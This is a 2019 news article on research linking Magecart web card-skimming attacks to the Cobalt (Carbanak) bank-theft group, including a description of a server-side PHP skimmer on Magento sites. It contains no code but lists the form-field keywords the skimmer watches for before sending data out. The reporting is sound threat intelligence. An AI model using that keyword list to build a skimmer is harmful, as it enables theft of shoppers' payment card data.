Cobalt cybercrime group might be launching Magecart skimming attacks

Researchers link Magecart-based skimming attacks to Cobalt (a.k.a. Carbanak), whose cyber attacks have netted millions of dollars.

Researchers have found links between Magecart-based Web skimming attacks and a sophisticated cybercrime group dubbed Cobalt that has stolen hundreds of millions from financial institutions worldwide. They also found evidence of server-side skimming, which is harder to detect than the typical JavaScript injections.

A joint analysis by Malwarebytes and security firm HYAS found significant similarities between the registration information for domain names used in their infrastructure by both Cobalt and a group tracked until now as Magecart Group 4 (MG4). In particular, both Cobalt and MG4 used the same email account naming pattern, the same email services, the same domain registrars and the same privacy protection services.

“Given the use of privacy services for all the domains in question, it is highly unlikely that this naming convention would be known to any other actor than the actors who registered both the Cobalt Group and Magecart infrastructure,” the researchers said in a report released today. “In addition, further investigation revealed that regardless of the email provider used, ten of the seemingly separate accounts reused only two different IP addresses, even over weeks and months between registrations.”

HYAS, which provides attribution intelligence services, searched its datasets and found a particular email address that registered Magecart domains but was also used in a spear-phishing email campaign with malicious Word documents that fits Cobalt’s modus operandi. The same address was also used to register domain names that are very similar to those used by Cobalt in the past.

Who is Cobalt?

The Cobalt group, also identified as Carbanak in some reports, is a cybercrime gang that specializes in stealing large amounts of money from banks and other financial organizations. The group typically breaks into the networks of their targets via spear-phishing emails with malicious attachments that exploit vulnerabilities in MIcrosoft Word.

After gaining a foothold, the group can spend months inside the compromised networks, performing lateral movement and studying their victims’ internal procedures and workflows, as well as their custom internal applications. This is all in preparation for a final heist that allows them to steal millions of dollars in one go, sometimes by hacking into the victim’s ATM network and sending money mules to collect the cash.

Magecart, on the other hand, is an umbrella moniker for around a dozen separate groups that break into e-commerce websites and inject malicious JavaScript files into their checkout pages in order to steal payment card details and other personal information entered by users. The Magecart groups are known for using a variety of techniques to inject their code into websites, including compromising third-party services that already have legitimate scripts loaded into the targeted websites for analytics, advertising and other purposes.

FIN6 cybercrime group also using card skimming

Recently, researchers from IBM found evidence that another cybercrime group called FIN6, which is related to Cobalt, has branched out into Web-based card skimming. FIN6 is known for compromising the physical point-of-sale systems of organizations from the retail, hospitality and restaurant sectors in order to steal payment card data. The recently observed Web skimming activity associated with FIN6 actually matches that of another group called Magecart Group 6.

“Based on their historical ties to the space, and the entrance of sophisticated actor groups such as FIN6 and others, it would be logical that Cobalt Group would also enter this field and continue to diversify their criminal efforts against global financial institutions,” the Malwarebytes and HYAS researchers said in their report.

Server-side skimming

While Magecart attacks are primarily client-side -- malicious JavaScript gets loaded and is executed inside users’ browsers -- Malwarebytes also found evidence of Magecart Group 4 performing server-side skimming. This technique involves the use of a PHP script that intercepts and exfiltrates data directly at the Web application level when it’s being processed.

Server-side skimming is much harder to detect, especially from the outside, because it’s not visible to browsers or website scanners. In order to detect such compromises, website owners must use a solution capable of scanning the files on the server itself or to monitor their integrity to identify rogue changes.

The reason why Malwarebytes spotted the MG4 server-side skimmer on a server was because the attackers made a mistake and served it as JavaScript instead. This allowed its contents to be indexed by a service called The file turned out to be an almost exact copy of a server-side PHP skimmer that researchers from Web security firm Sucuri reported in August.

The script is made to work with Magento, an ecommerce platform, and is automatically loaded by the application. It then monitors the application requests for certain keywords such as billing, cvv, year, cc_number, dummy, cc_, payment, card_number, username, expiry, firstname, login, shipping, month, securetrading, cvc2. If such keywords are detected, the request along with the cookie information is sent to an external server controlled by the attackers.

“The use of both client-side and server-side skimmers and the challenges this poses in identifying Magecart compromises by advanced threat groups necessitates the ongoing work of industry partners to help defend against this significant and growing threat,” the researchers said.

Copyright © 2019 IDG Communications, Inc.

7 hot cybersecurity trends (and 2 going cold)